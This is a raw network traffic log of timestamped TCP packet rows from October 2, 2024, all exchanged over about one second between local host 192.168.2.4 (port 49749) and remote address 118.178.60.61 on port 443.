Oct 2, 2024 04:28:43.107528925 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.107542038 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.112617970 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.112653017 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.112683058 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.112689018 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.112718105 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.112728119 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.117774010 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.117851973 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.117878914 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.117924929 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.123217106 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.123269081 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.123286963 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.123334885 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.126765013 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.126800060 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.126817942 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.126827002 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.126854897 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.126864910 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.129210949 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.129239082 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.129276037 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.129282951 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.129308939 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.129323006 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.142577887 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.142657995 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.142699957 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.142760038 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.146047115 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.146074057 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.146116018 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.146122932 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.146136045 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.146167994 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.150116920 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.150170088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.150182962 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.150202990 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.150228024 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.150247097 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.155656099 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.155723095 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.155725956 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.155733109 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.155770063 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.155781984 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.157429934 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.157474041 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.157502890 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.157509089 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.157521963 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.157543898 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.166632891 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.166701078 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.166712046 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.166757107 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.166843891 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.166893959 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.166943073 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.166981936 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.167882919 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.167911053 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.167939901 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.167946100 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.167960882 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.167983055 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.171724081 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.171803951 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.175770044 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.192514896 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.192594051 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.192631960 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.192684889 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.194060087 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.194108963 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.194200039 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.194245100 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.199368954 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.199440002 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.199450016 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.199455976 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.199481964 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.199505091 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.205267906 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.205312014 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.205322027 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.205327988 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.205377102 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.210114002 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.210176945 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.210176945 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.210189104 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.210217953 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.210233927 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.213736057 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.213784933 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.213794947 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.213864088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.216001987 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.216042042 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.216052055 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.216058016 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.216085911 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.219582081 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.229425907 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.229499102 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.229507923 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.229593039 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.232794046 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.232846022 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.232908964 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.233055115 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.236736059 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.236793995 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.236884117 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.236927986 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.242481947 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.242552042 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.242557049 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.242563963 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.242589951 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.242604971 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.244185925 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.244232893 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.244250059 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.244290113 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.253453016 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.253509998 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.253530025 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.253572941 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.253599882 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.253658056 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.253798008 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.253845930 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.254645109 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.254698992 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.254712105 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.254718065 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.254755974 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.254755974 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.258601904 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.258646965 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.258714914 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.258907080 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.279381037 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.279439926 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.279481888 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.279494047 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.279511929 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.279540062 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.280962944 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.281013012 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.281056881 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.281106949 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.286252022 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.286319017 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.286361933 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.286410093 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.292130947 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.292181969 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.292203903 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.292253017 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.297005892 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.297065973 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.297108889 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.297153950 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.300457001 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.300501108 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.300518990 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.300524950 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.300549984 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.300568104 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.302875996 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.302911043 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.302947044 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.302953959 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.302968025 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.303000927 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.316375971 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.316404104 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.316440105 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.316450119 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.316468954 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.316488981 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.319701910 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.319742918 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.319771051 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.319776058 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.319799900 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.319818974 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.323870897 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.323939085 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.323945045 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.323956013 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.323997021 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.329396963 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.329454899 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.329524040 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.329579115 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.331156015 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.331191063 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.331202984 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.331209898 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.331240892 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.331248999 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.340405941 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340451956 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340476990 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.340481997 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340492964 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340517044 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.340682983 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340724945 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.340725899 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.340733051 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.340773106 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.341403008 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.341453075 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.341495991 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.341538906 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.345493078 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.345549107 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.345576048 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.345621109 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.494781017 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.494792938 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.494812965 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.494874001 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.494893074 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.494913101 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.494919062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.494955063 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.494961977 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495006084 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495012045 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495028019 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495032072 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495045900 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495079994 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495085001 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495094061 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495127916 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495127916 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495135069 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495157003 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495162010 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495179892 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495203972 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495208979 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495224953 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495229959 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495239973 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495297909 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495306015 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495317936 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495332003 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495410919 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.495419025 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495433092 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.495500088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.497539043 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.497582912 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.497591972 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.497597933 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.497639894 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.503305912 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.503853083 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.503879070 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.503914118 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.503918886 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.503948927 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.503957987 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.504898071 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.504951954 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.504982948 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.505032063 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514153957 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514209986 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514257908 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514264107 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514280081 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514285088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514300108 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514305115 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514357090 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514358997 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514389992 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514389992 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.514398098 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.514477968 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.515098095 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.515151978 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.515170097 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.515222073 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.519285917 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.519344091 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.727412939 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.727469921 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.941612005 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.941637039 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.941648006 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.941741943 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.941749096 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.941797018 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996701002 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996716976 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996727943 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996742010 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996804953 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996810913 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996870995 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996875048 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996885061 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996892929 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996928930 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996933937 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996968031 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.996973038 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.996980906 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997001886 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.997005939 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997041941 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.997064114 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997078896 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.997096062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997107029 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997112989 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.997162104 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.997174978 CEST	443	49749	118.178.60.61	192.168.2.4
